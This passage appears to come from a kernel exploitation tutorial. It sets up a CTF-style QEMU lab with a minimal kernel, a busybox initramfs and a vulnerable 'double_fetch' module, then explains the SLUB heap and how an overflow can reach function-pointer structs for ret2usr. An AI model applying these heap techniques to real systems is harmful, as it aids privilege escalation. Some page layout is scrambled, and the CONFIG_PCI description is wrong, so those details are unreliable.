    • CONFIG_SMP - simultaneous multiprocessing; allows the kernel to run on multiple cores

    • CONFIG_PRINTK, CONFIG_PRINTK_TIME - enables log messages and timestamps

    • CONFIG_PCI - enables support for loading an initial RAM disk

    • CONFIG_RD_GZIP - enables support for gzip-compressed initrd images

    • CONFIG_BINFMT_ELF - enables support for executing ELF binaries

    • CONFIG_BINFMT_SCRIPT - enables executing scripts with a shebang (#!) line

    • CONFIG_DEVTMPFS - Enables automatic creation of device nodes in /dev at boot time using devtmpfs

    • CONFIG_INPUT - enables support for the generic input layer required for input device handling

    • CONFIG_INPUT_EVDEV - enables support for the event device interface, which provides a unified input event framework

    • CONFIG_INPUT_KEYBOARD - enables support for keyboards

    • CONFIG_MODULES - enables support for loading and unloading kernel modules

    • CONFIG_KPROBES - disables support for kprobes, a kernel-based debugging mechanism. We disable this because ... TODO

    • CONFIG_LTO_NONE - disables Link Time Optimization (LTO) for kernel compilation. This is to

    • CONFIG_SERIAL_8250, CONFIG_SERIAL_8250_CONSOLE - TODO

    • CONFIG_EMBEDDED - disables optimizations/features for embedded systems

    • CONFIG_TMPFS - enables support for the tmpfs in-memory filesystem

    • CONFIG_RELOCATABLE - builds a relocatable kernel that can be loaded at different physical addresses

    • CONFIG_RANDOMIZE_BASE - enables KASLR support

    • CONFIG_USERFAULTFD - enables support for the userfaultfd system call, which allows handling of page faults in user space

    In order to update the minimal .config with these options, we use the provided merge_config.sh script:

    hashtag
    Building

    That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage. This is the same bzImage that you get in CTF challenges.

    hashtag
    Kernel Modules

    When we compile kernel modules for our own kernel, we use the following Makefile structure:

    To compile it for a different kernel, all we do is change the -C flag to point to the newly-compiled kernel rather than the system's:

    The module is now compiled for the specific kernel version!

    hashtag
    Booting the Kernel in a Virtual Machine

    hashtag
    References

    • Build the Linux kernel and Busybox and run them on QEMUarrow-up-right

    • How to Build A Custom Linux Kernel For Qemu (2015 Edition)arrow-up-right

    hashtag
    Creating the File System and Executables

    We now have a minimal kernel bzImage and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.

    To do this, we use busyboxarrow-up-right, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.

    We will download and extract busybox; you can find the latest version herearrow-up-right.

    We also create an output folder for compiled versions.

    Now compile it statically. We're going to use the menuconfig option, so we can make some choices.

    Once the menu loads, hit Enter on Settings. Hit the down arrow key until you reach the option Build static binary (no shared libs). Hit Space to select it, and then Escape twice to leave. Make sure you choose to save the configuration.

    Now, make it with the new options

    Now we make the file system.

    The last thing missing is the classic init script, which gets run on system load. A provisional one works fine for now:

    Make it executable

    Finally, we're going to bundle it into a cpio archive, which is understood by QEMU.

    circle-exclamation
    • The -not -name *.cpio is there to prevent the archive from including itself

    • You can even compress the filesystem to a .cpio.gz file, which QEMU also recognises

    If we want to extract the cpio archive (say, during a CTF) we can use this command:

    hashtag
    Loading it with QEMU

    Put bzImage and initramfs.cpio into the same folder. Write a short run.sh script that loads QEMU:

    chevron-rightExplanation of Flagshashtag
    • -kernel bzImage - sets the kernel to be our compiled bzImage

    • -initrd initramfs.cpio - provide the file system

    • -append ... - basic features; in the future, this flag is also used to set protections

      • console=ttyS0 - Directs kernel messages to the first serial port (ttyS0)

      • quiet

    • -monitor /dev/null - Disable the QEMU monitor

    • -nographic - Disable GUI, operate in headless mode (faster)

    • no-reboot - Do not automatically restart the VM when encountering a problem (useful for debugging and working out why it crashes, as the crash logs will stay).

    Once we make this executable and run it, we get loaded into a VM!

    hashtag
    User Accounts

    Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:

    This is because /etc/passwd and /etc/group don't exist, so we can just create those!

    hashtag
    Loading the Kernel Module

    The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.

    First, we copy the .ko file to the filesystem root. Then we modify the init script to load it, and also set the UID of the loaded shell to 1000 (so we are not root!).

    triangle-exclamation

    Here I am assuming that the major number of the double_fetch module is 253.

    Why am I doing that?

    If we load into a shell and run cat /proc/devices, we can see that double_fetch is loaded with major number 253 every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!

    hashtag
    Compiling a Different Kernel Version

    If we want to compile a kernel version that is not the latest, we'll dump all the tagsarrow-up-right:

    It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:

    We then continue from there.

    triangle-exclamation

    Some tags seem to not have the correct header files for compilation. Others, weirdly, compile kernels that build, but then never load in QEMU. I'm not quite sure why, to be frank.

    Kernel Heap

    The pain of it all

    Historically, the Linux kernel has had three main heap allocators: SLOB, SLAB and SLUB.

    SLUB is the latest version, replacing SLAB as of . SLOB was used as the backup to SLAB and SLUB, but was removed in . As a result, SLUB is all we really have to care about (even pre-6.4, SLOB was practically never used). From here on out, we will only talk about SLUB, unless explicitly stated.

    Note that, confusingly, "chunks" in the kernel heap are called objects and they are stored in slabs.

    hashtag

    $ apt-get install flex bison libelf-dev
    git clone https://github.com/torvalds/linux --depth=1
    $ cd linux
    $ rm -f .config
    $ make allnoconfig
      YACC    scripts/kconfig/parser.tab.[ch]
      HOSTCC  scripts/kconfig/lexer.lex.o
      HOSTCC  scripts/kconfig/menu.o
      HOSTCC  scripts/kconfig/parser.tab.o
      HOSTCC  scripts/kconfig/preprocess.o
      HOSTCC  scripts/kconfig/symbol.o
      HOSTCC  scripts/kconfig/util.o
      HOSTLD  scripts/kconfig/conf
    #
    # configuration written to .config
    #
    CONFIG_64BIT=y
    CONFIG_SMP=y
    CONFIG_PRINTK=y
    CONFIG_PRINTK_TIME=y
    
    CONFIG_PCI=y
    
    # We use an initramfs for busybox with elf binaries in it.
    CONFIG_BLK_DEV_INITRD=y
    CONFIG_RD_GZIP=y
    CONFIG_BINFMT_ELF=y
    CONFIG_BINFMT_SCRIPT=y
    
    # This is for /dev file system.
    CONFIG_DEVTMPFS=y
    
    # For the power-down button (triggered by qemu's `system_powerdown` command).
    CONFIG_INPUT=y
    CONFIG_INPUT_EVDEV=y
    CONFIG_INPUT_KEYBOARD=y
    
    CONFIG_MODULES=y
    
    CONFIG_KPROBES=n
    CONFIG_LTO_NONE=y
    CONFIG_SERIAL_8250=y
    CONFIG_SERIAL_8250_CONSOLE=y
    CONFIG_EMBEDDED=n
    CONFIG_TMPFS=y
    
    CONFIG_RELOCATABLE=y
    CONFIG_RANDOMIZE_BASE=y
    
    CONFIG_USERFAULTFD=y
    $ scripts/kconfig/merge_config.sh .config ../kconfig
    $ make -j4
    all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
    all:
        make -C /home/ir0nstone/linux M=$(PWD) modules
    $ curl https://busybox.net/downloads/busybox-1.36.1.tar.bz2 | tar xjf -
    $ mkdir busybox_compiled
    $ cd busybox-1.36.1
    $ make O=../busybox_compiled menuconfig
    $ cd ../busybox_compiled
    $ make -j
    $ make install
    $ cd ..
    $ mkdir initramfs
    $ cd initramfs
    $ mkdir -pv {bin,dev,sbin,etc,proc,sys/kernel/debug,usr/{bin,sbin},lib,lib64,mnt/root,root}
    $ cp -av ../busybox_compiled/_install/* .
    $ sudo cp -av /dev/{null,console,tty,sda1} dev/
    #!/bin/sh
     
    mount -t proc none /proc
    mount -t sysfs none /sys
     
    echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
     
    exec /bin/sh
    $ chmod +x init
    find . -not -name *.cpio | cpio -o -H newc > initramfs.cpio
    $ cpio -i -F initramfs.cpio
    #!/bin/sh
    
    qemu-system-x86_64 \
        -kernel bzImage \
        -initrd initramfs.cpio \
        -append "console=ttyS0 quiet loglevel=3 oops=panic" \
        -monitor /dev/null \
        -nographic \
        -no-reboot
    ~ # whoami
    whoami: unknown uid 0
    /etc/passwd
    root:x:0:0:root:/root:/bin/sh
    user:x:1000:1000:User:/home/user:/bin/sh
    /etc/group
    root:x:0:
    user:x:1000:
    #!/bin/sh
    
    insmod /double_fetch.ko
    mknod /dev/double_fetch c 253 0
    chmod 666 /dev/double_fetch
    
    mount -t proc none /proc
    mount -t sysfs none /sys
    
    mknod -m 666 /dev/ttyS0 c 4 64
    
    setsid /bin/cttyhack setuidgid 1000 /bin/sh
    $ git fetch --tags
    $ git checkout v5.11
    - Only showing critical messages from the kernel
  • loglevel=3 - Only show error messages and higher-priority messages

  • oops=panic - Make the kernel panic immediately on an oops (kernel error)

  • allow better debuggingarrow-up-right
    Slabs and Caches

    Unlike the glibc heap, SLUB has fixed sizes for objects, which are powers of 2 up to 8192 along with 96 and 192. These are conveniently called kmalloc-8, kmalloc-16, kmalloc-32 , kmalloc-64, kmalloc-96, kmalloc-128, kmalloc-192, kmalloc-256, kmalloc-512, kmalloc-1k, kmalloc-2k, kmalloc-4k and kmalloc-8k. We call these individual classifications caches, and they are comprised of slabs.

    Each slab is assigned its own area of memory and comprised of 1 or more continuous pages. If the kernel wants to allocate space in the heap, it will call kmalloc and pass it the size (and some flags). The size will be rounded up to fit in the smallest possible cache, then assigned there. Anything larger than 8192 bytes will not use kmalloc at all, and uses page_alloc instead.

    This approach is a massive performance improvement. It can also make exploitation primitives harder, as every object is the same size and it's harder to overlap. Similarly, because the sizes are determined by the cache rather than metadata, we cannot fake size.

    hashtag
    Slab Creation

    We can get to a point where we have so many objects in a cache that they fill all of the slabs. In this case, a new slab is created. This slab does not create the singular object - it will create multiple objects. Why? Because the kernel knows that this slab is only used for kmalloc-1k objects, it creates all possible objects immediately and marks the remaining as free.

    These remaining three are saved in the freelist in a random order, provided that the configuration CONFIG_SLAB_FREELIST_RANDOM is enabled (which it is by default).

    The default size of slabs depends on the cache it is being used for. You can read /proc/slabinfo to see the current configuration for the system:

    Here objsize is the size of each element in the cache, and objsperslab is the number of objects created at once when a new slab is initialized. Then pagesperslab is the product of objsize/0x1000 (pages per object) and objperslab, and tells you how many pages each slab has.

    TODO CONFIG_SLAB_FREELIST_HARDENED.

    hashtag
    The Kernel Heap is Global

    One major difference between user- and kernel-mode heap exploitation is that the kernel heap is shared between all kernel processes. Kernel modules and every other aspect of the kernel use the same heap.

    So, let's say you find some sort of kernel heap primitive - an overflow, for example. Overflowing into identical objects might not be helpful, but in the kernel, we can find common structs with powerful primitives that we can use to our advantage. Imagine that there is a struct that contains a function pointer, and you can trigger a call to this function. If this struct is allocated to the same cache as the object you can overflow, it is possible to allocate this struct such that it inhabits the object located directly behind in memory. Suddenly the overflow is incredibly powerful, and can lead immediately to something like a ret2usr.

    version 2.6.23arrow-up-right
    version 6.4arrow-up-right
    $ sudo cat /proc/slabinfo
    # name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> [...]
    [...]
    kmalloc-8k            80            80        8192          4            8
    kmalloc-4k           208           208        4096          8            8
    kmalloc-2k           768           768        2048         16            8
    kmalloc-1k          1296          1296        1024         16            4
    kmalloc-512         2190          2224         512         16            2
    kmalloc-256         1917          1936         256         16            1
    kmalloc-128         1024          1024         128         32            1
    kmalloc-64          7532          7936          64         64            1
    kmalloc-32          6442          6528          32        128            1
    kmalloc-16         10123         10240          16        256            1
    kmalloc-8           5120          5120           8        512            1
    kmalloc-192         3885          3885         192         21            1
    kmalloc-96          3506          4158          96         42            1